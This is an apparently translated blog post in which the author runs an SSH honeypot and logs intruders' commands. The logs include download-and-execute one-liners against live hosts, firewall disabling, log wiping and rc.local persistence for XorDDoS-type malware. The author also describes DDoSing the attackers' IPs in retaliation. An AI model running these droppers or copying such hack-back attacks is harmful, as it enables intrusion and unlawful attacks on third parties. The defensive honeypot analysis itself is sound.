Background

Before heading out for the Dragon Boat Festival, to make it easier to manage downloads on the NAS at home, I set up frp (an intranet tunnel) on the router and mapped the NAS web UI and SSH port to a server on the public internet. The web UI port was below 10000 and the SSH port above 20000.
When I got to the hotel that evening I logged into the NAS web UI and saw in its logs that someone, coming in through the router (192.168.1.1), was brute-forcing SSH on the NAS, once an hour, trying usernames like ftpadmin, mysql, root, admin and so on. So I went to the frp server to look at its logs, and surprisingly the source IP of the SSH connections was nowhere to be seen.

Capturing the IP

So I shut frp down and moved the VPS's sshd from port 22 to that port.

# vim /etc/ssh/sshd_config

Change the line

Port 22

Then restart sshd

service ssh restart

After a while I connected to the VPS from my phone with JuiceSSH (remember to use the new SSH port) and checked the SSH authentication log

# cat /var/log/auth.log

Found the idiot

Jun 18 18:22:28 xx sshd[31547]: Connection closed by 118.186.17.x [preauth]
Jun 18 18:48:21 xx sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x user=root
Jun 18 18:48:23 xx sshd[31563]: Failed password for root from 118.186.17.x port 34658 ssh2
Jun 18 18:48:23 xx sshd[31563]: Connection closed by 118.186.17.x [preauth]
Jun 18 19:14:20 xx sshd[31570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x user=root
Jun 18 19:14:21 xx sshd[31570]: Failed password for root from 118.186.17.x port 52498 ssh2
Jun 18 19:14:22 xx sshd[31570]: Connection closed by 118.186.17.x [preauth]
Jun 18 19:17:01 xx CRON[31572]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 18 19:17:01 xx CRON[31572]: pam_unix(cron:session): session closed for user root
Jun 18 19:40:14 xx sshd[31577]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x user=root
Jun 18 19:40:16 xx sshd[31577]: Failed password for root from 118.186.17.x port 42118 ssh2

At first it also brute-forced other users; now it only tries root. The "2" in ssh2 is the "Protocol 2" from the config file.
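As an added example (not from the original post), here is a small Python parser for "Failed password" lines of the kind shown above: it groups attempts by source address, lists the usernames tried, and measures the gap between attempts, which is what separates a low-and-slow once-an-hour probe from a burst that a fail2ban-style rate threshold would catch. The log lines and addresses are constructed; the year and the 600-second findtime window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean

# Constructed sample in the sshd/pam_unix format shown in the post; the
# addresses are documentation ranges, not the attacker's real address.
SAMPLE_LOG = """\
Jun 18 18:22:28 xx sshd[31547]: Connection closed by 198.51.100.5 [preauth]
Jun 18 18:48:21 xx sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.51.100.5 user=root
Jun 18 18:48:23 xx sshd[31563]: Failed password for root from 198.51.100.5 port 34658 ssh2
Jun 18 19:14:21 xx sshd[31570]: Failed password for root from 198.51.100.5 port 52498 ssh2
Jun 18 19:17:01 xx CRON[31572]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 18 19:40:16 xx sshd[31577]: Failed password for root from 198.51.100.5 port 42118 ssh2
Jun 18 19:41:02 xx sshd[31580]: Failed password for invalid user ftpadmin from 203.0.113.7 port 40000 ssh2
Jun 18 19:41:05 xx sshd[31581]: Failed password for invalid user mysql from 203.0.113.7 port 40001 ssh2
Jun 18 19:41:08 xx sshd[31582]: Failed password for admin from 203.0.113.7 port 40002 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def parse_failed_logins(text, year=2018):
    """One dict per 'Failed password' line. Syslog timestamps carry no
    year, so the caller supplies it (2018 here is an assumption)."""
    events = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "user": m["user"], "ip": m["ip"],
                       "invalid_user": m["invalid"] is not None})
    return events

def summarize_by_ip(events):
    """Group attempts per source address and measure the spacing between them."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["ip"]].append(ev)
    summary = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(evs, evs[1:])]
        summary[ip] = {"attempts": len(evs),
                       "users": sorted({e["user"] for e in evs}),
                       "mean_gap_s": mean(gaps) if gaps else None}
    return summary

def classify(entry, min_attempts=3, findtime_s=600):
    """'low-and-slow' when attempts are spaced wider than a typical fail2ban
    findtime window (10 min by default), so a rate-based ban never triggers;
    'burst' when packed closer than that; None when too few to judge."""
    if entry["attempts"] < min_attempts or entry["mean_gap_s"] is None:
        return None
    return "low-and-slow" if entry["mean_gap_s"] > findtime_s else "burst"

if __name__ == "__main__":
    for ip, entry in summarize_by_ip(parse_failed_logins(SAMPLE_LOG)).items():
        print(ip, entry, classify(entry))
```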

Probing the IP

Looked up the IP; it's in Beijing.

I DDoSed it via LDAP and NTP for 200 seconds; it went down while under attack but came back afterwards. I assumed it was a home broadband line.

Then I ran an nmap port scan and OS fingerprint to identify the target.

Nmap scan report for 118.186.17.x
Host is up (0.075s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
443/tcp open https
445/tcp filtered microsoft-ds
2288/tcp open netml
3306/tcp open mysql
5800/tcp filtered xxc-http
5900/tcp filtered xxc
8888/tcp open sun-answerbook
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 19 hops

Checked 2288, 5800, 5900 and 8888 with nc:
2288 and 8888 are SSH ports
5800 and 5900 are nginx ports

2288 feels a bit like a router port forward, but after being hit for that long a router would have died long ago.
It must be a real server.

Looked the IP up on ipip.net

Location: China, Beijing, Beijing (China Telecom)
ASN 4134 (CHINANET-BACKBONE No.31,Jin-rong Street, CN)
Threat intelligence:
dshield : 20180620 : botnet
mirrors : 20180516 : spam
firehol : 20180516 : malware
firehol : 20180620 : network attack

That made me think of checking the IP on ThreatBook (微步威胁情报).
Sure enough it had records for this IP,
with malicious activity logged continuously since 2017-08-27.

Source              Discovered   Type
Open-source intel   2018-06-11   scanning
Open-source intel   2018-05-29   suspicious
Open-source intel   2018-05-10   suspicious
ThreatBook Labs     2018-05-04   IDC server
Open-source intel   2017-11-23   scanning (expired)
Open-source intel   2017-11-16   suspicious
Open-source intel   2017-09-20   malware
Open-source intel   2017-09-20   suspicious
Open-source intel   2017-09-20   suspicious
Open-source intel   2017-09-20   suspicious
Open-source intel   2017-09-20   suspicious
Open-source intel   2017-09-20   suspicious
Open-source intel   2017-09-19   malware
Open-source intel   2017-09-12   scanning
ThreatBook Labs     2017-09-01   botnet
ThreatBook Labs     2017-09-01   spam, botnet
Open-source intel   2017-08-30   scanning
Open-source intel   2017-08-29   suspicious
Open-source intel   2017-08-29   suspicious
ThreatBook Labs     2017-08-27   spam (expired)
ThreatBook Labs     2016-07-08   IDC server

Seems like a serious operator.

SSH honeypot

Why not set up a honeypot and see what this person does once they get an SSH session, what files they download and from where; that would leave far more information behind.

After some searching I settled on this honeypot: "基于Paramiko的高交互SSH蜜罐" (a high-interaction SSH honeypot based on Paramiko).
That article was written last August. Last April I had installed kippo on a Raspberry Pi; kippo is simple to get running too: clone the code, edit the config file and start it. But this time I wanted to try this new honeypot.

The honeypot is called wetland; its source is on GitHub: https://github.com/ohmyadd/wetland

Deployment with Docker:

Install docker: curl -sSL https://get.docker.com/ | sh

  1. Start the sshd container
    docker run -d --name sshd rastasheep/ubuntu-sshd

Then run docker inspect sshd to find the container's IP address.
If this is your first docker container, it is usually 172.17.0.2.

  2. Start wetland, configured through environment variables
    docker run -d --name wetland -v ~/log:/root/wetland/log -p 22:22 -e SENSOR=test -e SSHDADDR=172.17.0.2 -e BEARYCHAT1='https://hook.bearychat.com/xxx' ohmyadd/wetland
  • SENSOR: sensor name, identifies this [wetland] instance
  • SSHDADDR: IP address of the sshd container
  • BEARYCHAT1: the bearychat hook URL

bearychat is a team collaboration platform where you can add chat bots; each bot gets a hook URL, and anything posted to that URL is pushed by the bot to you.

Setup:
Team admin - Robots - Add robot - Custom tab - Incoming - Add; you will then see a hook URL of the form https://hook.bearychat.com/xxx.

Once it was up, I tested it from my side.
ssh [vps-ip] -p [ssh-port]

I typed a couple of random weak passwords and got an SSH session. The bot had already sent a message: hacker IP xxxx connected to the sensor named test. Whatever commands are run can also be seen in real time.

Catch 1

Nothing for the next two days. Checking auth.log, I found that the jerk had connected to SSH and then disconnected again:

Jun 19 00:20:37 xx sshd[30738]: Received signal 15; terminating.
Jun 19 00:20:37 xx sshd[2103]: Server listening on 0.0.0.0 port 2368.
Jun 19 00:20:37 xx sshd[2103]: Server listening on :: port 2368.
Jun 19 00:21:56 xx sshd[2128]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jun 19 00:22:29 xx sshd[2128]: pam_unix(sshd:session): session closed for user root
Jun 19 00:31:01 xx CRON[2399]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 00:31:14 xx CRON[2399]: pam_unix(cron:session): session closed for user root
Jun 19 00:31:39 xx sshd[1892]: pam_unix(sshd:session): session closed for user root
Jun 19 01:17:01 xx CRON[3203]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 01:17:01 xx CRON[3203]: pam_unix(cron:session): session closed for user root
Jun 19 02:17:01 xx CRON[3394]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 02:17:01 xx CRON[3394]: pam_unix(cron:session): session closed for user root
Jun 19 03:17:01 xx CRON[3561]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 03:17:01 xx CRON[3561]: pam_unix(cron:session): session closed for user root
Jun 19 04:17:01 xx CRON[3729]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 04:17:01 xx CRON[3729]: pam_unix(cron:session): session closed for user root
Jun 19 05:17:01 xx CRON[3901]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 05:17:01 xx CRON[3901]: pam_unix(cron:session): session closed for user root
Jun 19 06:17:01 xx CRON[4020]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 06:17:01 xx CRON[4020]: pam_unix(cron:session): session closed for user root
Jun 19 07:17:01 xx CRON[4312]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 07:17:01 xx CRON[4312]: pam_unix(cron:session): session closed for user root
Jun 19 08:17:01 xx CRON[4465]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 08:17:01 xx CRON[4465]: pam_unix(cron:session): session closed for user root
Jun 19 09:17:01 xx CRON[4659]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 09:17:01 xx CRON[4659]: pam_unix(cron:session): session closed for user root
Jun 19 10:17:01 xx CRON[4721]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 10:17:01 xx CRON[4721]: pam_unix(cron:session): session closed for user root
Jun 19 11:17:01 xx CRON[4777]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 11:17:01 xx CRON[4777]: pam_unix(cron:session): session closed for user root

Very steadily, once an hour.
It only gets as far as the SSH authentication step and then quits; the honeypot has no log of it, meaning it never reached the honeypot at all. My guess is that the host key is different.
When the host key changes, the SSH client warns that the key doesn't match and the old record (in known_hosts) has to be removed; the script evidently doesn't handle that case.

So I switched to a VPS that was about to expire, installed the honeypot there and waited for prey.

After a while, bearychat on the iPad started pushing like crazy..

Sensor:	rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: login
Content: login successful

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec command
Content: cd /bin/
curl http://107.150.36.133/g.txt -o ygljglkjgfg0
chmod +x ygljglkjgfg0
/bin/ygljglkjgfg0
wget http://107.150.36.133/g.txt -O ygljglkjgfg1
chmod +x ygljglkjgfg1
/bin/ygljglkjgfg1
good http://107.150.36.133/g.txt -O ygljglkjgfg2
chmod +x ygljglkjgfg2
/bin/ygljglkjgfg2
sleep 2
wget http://107.150.36.133/w.txt -O sdf3fslsdf13
chmod +x sdf3fslsdf13
/bin/sdf3fslsdf13
good http://107.150.36.133/w.txt -O sdf3fslsdf14
chmod +x sdf3fslsdf14
/bin/sdf3fslsdf14
curl http://107.150.36.133/w.txt -o sdf3fslsdf15
chmod +x sdf3fslsdf15
/bin/sdf3fslsdf15
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
cat /dev/null >/root/.bash_history
ls -la /etc/daemon.cfg
exit $?

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec_request
Content: success

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec_request
Content: success

Sensor: rom
Hacker: 103.42.28.212
MyIP: 172.17.0.3
Action: exec command
Content: ls -la /etc/daemon.cfg

This little bastard renamed my wget to good??
Then it downloaded two programs.
ls -la /etc/daemon.cfg is presumably to check whether the program ran correctly.

First I downloaded g.txt and w.txt and uploaded them to an online analysis platform

https://x.threatbook.cn/report/scan/47bf33fd353be8b334f188c839dac4a6a1b71fe220a1c98122628cc5fddabe3d-1513073717870

https://x.threatbook.cn/report/scan/444ccc1249fe4a9ad6a24cea79ec60be45a438405f3c86346ff72433afbb3a71-1513073215948

It's a DDoS client, specifically XorDDoS

Check it with file

─[$] <> file w.txt 
w.txt: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

It's an executable, and I'm a noob who can't do reverse engineering qwq....
If you can reverse it, you could probably trace it and find the C&C server address.

Later I found an analysis of XorDDoS on FreeBuf: 一次XorDDos变种样本的分析实战记录 (a hands-on analysis of an XorDDoS variant sample)

Afterwards I reset the honeypot. Thinking back, I should have run netstat to look at the connections; that might have told me something, though it's also possible the C&C server only connects when it hands out a task, and I don't know whether the client connects out or waits for inbound connections. Anyway, the program is in my hands; I can run it and check whenever I like.

File location

Afterwards I hit 103 and 107 with 100 seconds of NTP each; as of writing, neither can be reached, heh.

Catch 2

Last time was on the rom machine; this time I'm back on the first machine. While writing this post I was going through auth.log and found a new IP (103.219.112.69) continuously brute-forcing the host's SSH. The host's SSH had already been moved to a 2000+ port last time, and the honeypot was on a 20000+ port.

While changing the port, I reset the honeypot as well

docker stop wetland
docker rm wetland

Change the host's sshd listening port,
then re-run the wetland container with its published port set to the port sshd was on before.

103 never showed up; 123 did instead.

Sensor:	x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: login
Content: login successful

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: service iptables stop

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: cd /tmp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: wget http://mdb7.cn:8081/exp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: chmod 0777 /root/exp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: nohup /root/exp > /dev/null 2>&1 &

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: rm -f /var/log/wtmp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: rm -rf exp

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: wget -P/tmp http://123.249.27.28:613/pud

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: chmod 0777 /tmp/pud

Sensor: x
Hacker: 123.249.27.28
MyIP: 172.17.0.3
Action: exec command
Content: /tmp/./pud

mdb7.cn can't be reached

Downloaded pud and uploaded it: analysis report

Backdoor + DDoS

123.249.27.28: 50 seconds of NTP, it's down now.
This IP has also been up to no good for a long time:
https://x.threatbook.cn/ip/123.249.27.28

pud file backup

I killed a few processes. This one is a bit rubbish: never mind that the server got knocked over, the program didn't even set up autostart.

Just saw a project on GitHub called kippo-detect, for detecting whether a host is a honeypot; I think these brute-force kids should check for a honeypot first.
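The wetland notifications in catch 1 and catch 2 share one format (Sensor/Hacker/MyIP/Action/Content, with multi-line content when a whole script is pasted in). As an added example that is not part of the post or of wetland, the Python below parses that feed and pulls out, per attacker address, the download URLs and the evasion or persistence behaviours seen in both captures (renaming wget, wiping .bash_history, stopping iptables, deleting wtmp, appending to rc.local). The feed, addresses and URLs are constructed.

```python
import re
from collections import defaultdict

# Constructed notifications in the format wetland pushes to the chat hook
# (see the post); addresses and URLs are documentation values, not captured ones.
SAMPLE_FEED = """\
Sensor:\trom
Hacker: 203.0.113.10
MyIP: 172.17.0.3
Action: exec command
Content: cd /bin/
curl http://192.0.2.7/g.txt -o ygljglkjgfg0
mv /usr/bin/wget /usr/bin/good
cat /dev/null >/root/.bash_history
exit $?

Sensor: x
Hacker: 198.51.100.9
MyIP: 172.17.0.3
Action: exec command
Content: service iptables stop

Sensor: x
Hacker: 198.51.100.9
MyIP: 172.17.0.3
Action: exec command
Content: wget -P/tmp http://198.51.100.9:613/pud
chmod 0777 /tmp/pud
rm -f /var/log/wtmp
"""

FIELDS = ("Sensor", "Hacker", "MyIP", "Action", "Content")
URL_RE = re.compile(r"https?://[^\s;'\"]+")
# Post-exploitation behaviours seen in the captures and the command that betrays each.
EVASION = {
    "disables firewall": re.compile(r"\biptables stop\b"),
    "wipes shell history": re.compile(r"/dev/null\s*>\s*\S*\.bash_history"),
    "removes login records": re.compile(r"rm\s+-r?f\s+/var/log/(wtmp|btmp|lastlog)"),
    "hides/renames wget": re.compile(r"mv\s+\S*/wget\s"),
    "adds rc.local persistence": re.compile(r">>\s*/etc/rc\.local"),
}

def parse_feed(text):
    """One dict per record; a record starts at 'Sensor:' and every line after 'Content:' belongs to it."""
    records, cur = [], None
    for line in text.splitlines():
        if line.startswith("Sensor:"):
            cur = {}
            records.append(cur)
        if cur is None:
            continue
        if "Content" in cur:  # continuation line of multi-line content
            cur["Content"] = (cur["Content"] + "\n" + line).strip()
        else:
            key, _, val = line.partition(":")
            if key in FIELDS:
                cur[key] = val.strip()
    return records

def extract_iocs(records):
    """Per attacker IP: download URLs and evasion/persistence behaviours found in its commands."""
    by_ip = defaultdict(lambda: {"urls": [], "evasion": []})
    for r in records:
        if r.get("Action") not in ("exec command", "shell command"):
            continue
        e = by_ip[r["Hacker"]]
        e["urls"] += [u for u in URL_RE.findall(r["Content"]) if u not in e["urls"]]
        e["evasion"] += [k for k, p in EVASION.items()
                         if p.search(r["Content"]) and k not in e["evasion"]]
    return dict(by_ip)
```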

Prey 3

Sensor:	rom2
Hacker: 104.223.213.141
MyIP: 172.17.0.3
Action: exec command
Content: #!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://104.223.213.141/a21jj
curl -O http://104.223.213.141/a21jj
chmod +x a21jj
./a21jj

Sensor: rom2
Hacker: 104.223.213.141
MyIP: 172.17.0.3
Action: exec command
Content: ls -la /var/run/gcc.pid

[email protected]:~# cat /var/run/gcc.pid
uhukenmftxpilnavmgpzoxmjalenfylb

Prey n?

wget http://96.44.186.214:5414/Linux-syn19001ss
chmod 0755 /root/Linux-syn19001ss
nohup /root/Linux-syn19001ss > /dev/null 2>&1 &
chmod 777 Linux-syn19001ss
./Linux-syn19001ss
chmod 0755 /root/Linux-syn19001ss
nohup /root/Linux-syn19001ss &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 Linux-syn19001ss
chmod u+x Linux-syn19001ss
./Linux-syn19001ss &
chmod u+x Linux-syn19001ss
./Linux-syn19001ss &
cd /tmp
service iptables stop
wget http://96.44.186.214:5414/Linux-udp19001s
chmod 0755 /root/Linux-udp19001s
nohup /root/Linux-udp19001s > /dev/null 2>&1 &
chmod 777 Linux-udp19001s
./164
chmod 0755 /root/Linux-udp19001s
nohup /root/Linux-udp19001s &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 Linux-udp19001s
chmod u+x Linux-udp19001s
./Linux-udp19001s &
chmod u+x dos6cc4
./Linux-udp19001s &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./Linux-syn19001ss&">>/etc/rc.local
echo "./Linux-udp19001s&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

Prey n+1

Sensor:	rom3
Hacker: 173.249.54.210
MyIP: 172.17.0.3
Action: exec command
Content: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://167.99.39.63/8UsA.sh; curl -O http://167.99.39.63/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 167.99.39.63 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 167.99.39.63; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 167.99.39.63 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *

Prey n+2

wget http://96.44.186.214:5414/liuxs512
chmod 0755 /root/liuxs512
nohup /root/liuxs512 > /dev/null 2>&1 &
chmod 777 liuxs512
./liuxs512
chmod 0755 /root/liuxs512
nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 liuxs512
chmod u+x liuxs512
./liuxs512 &
chmod u+x liuxs512
./liuxs512 &
cd /tmp
service iptables stop
wget http://96.44.186.214:5414/liuxs512
chmod 0755 /root/liuxs512
nohup /root/liuxs512 > /dev/null 2>&1 &
chmod 777 liuxs512
./164
chmod 0755 /root/liuxs512
nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 liuxs512
chmod u+x liuxs512
./liuxs512 &
chmod u+x dos6cc4
./liuxs512 &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./liuxs512&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
service iptables stop
wget http://96.44.186.214:5414/liuxs512
chmod 0755 /root/liuxs512
nohup /root/liuxs512 > /dev/null 2>&1 &
chmod 777 liuxs512
./liuxs512
chmod 0755 /root/liuxs512
nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 liuxs512
chmod u+x liuxs512
./liuxs512 &
chmod u+x liuxs512
./liuxs512 &
cd /tmp
service iptables stop
wget http://96.44.186.214:5414/liuxs512
chmod 0755 /root/liuxs512
nohup /root/liuxs512 > /dev/null 2>&1 &
chmod 777 liuxs512
./164
chmod 0755 /root/liuxs512
nohup /root/liuxs512 &gt; /dev/null 2&gt;&amp;1 &amp;
chmod 0777 liuxs512
chmod u+x liuxs512
./liuxs512 &
chmod u+x dos6cc4
./liuxs512 &
cd /tmp
echo "cd /root/">>/etc/rc.local
echo "./liuxs512&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
ps aux
ifconfig
ip address
address
ipaddress
ipadrss
passwd
/sbin/ifconfig
apt-get install net-tools
/sbin/ifconfig/sbin/ifconfig
/sbin/ifconfig
who
history

It even changed my password
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: root123

Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 62.112.11.81
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'172.217.23.206', 80)
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content:
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install [email protected]:~# apt-get pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: [email protected]:~#
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: E: Invalid operation pip
Sensor: rom3
Hacker: 217.23.12.117
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.12.117
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'216.58.212.206', 80)
Sensor: rom3
Hacker: 62.210.37.8
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 62.210.37.8
MyIP: 172.17.0.3
Action: shell_request
Content: success
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install Python-pip
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: yum install Python-pip
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install python-pip
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: y
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 26499), dest:(u'204.79.197.200', 80)
Sensor: rom3
Hacker: 194.88.107.163
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'172.217.23.206', 80)
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 217.23.10.20
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: sudo apt-get install python-pip python-dev build-essential
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'localhost', 8080), dest:(u'34.207.2.165', 80)
Sensor: rom3
Hacker: 178.132.0.39
MyIP: 172.17.0.3
Action: direct_request
Content: failed
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: sudo apt-get install python-pip python-dev build-essudo apt-get install python-pip python-dev build-essential
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: apt-get install pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: pip install tldextract
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: cd /var/tmp/scanner
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: chmod 777 *
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ./start 188
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 23550), dest:(u'13.107.21.200', 80)
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: login
Content: login successful
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell_request
Content: success
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ifconfig
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ifconfig
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: ifconfig
Sensor: rom3
Hacker: 217.23.7.25
MyIP: 172.17.0.3
Action: direct_request
Content: ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor: rom3
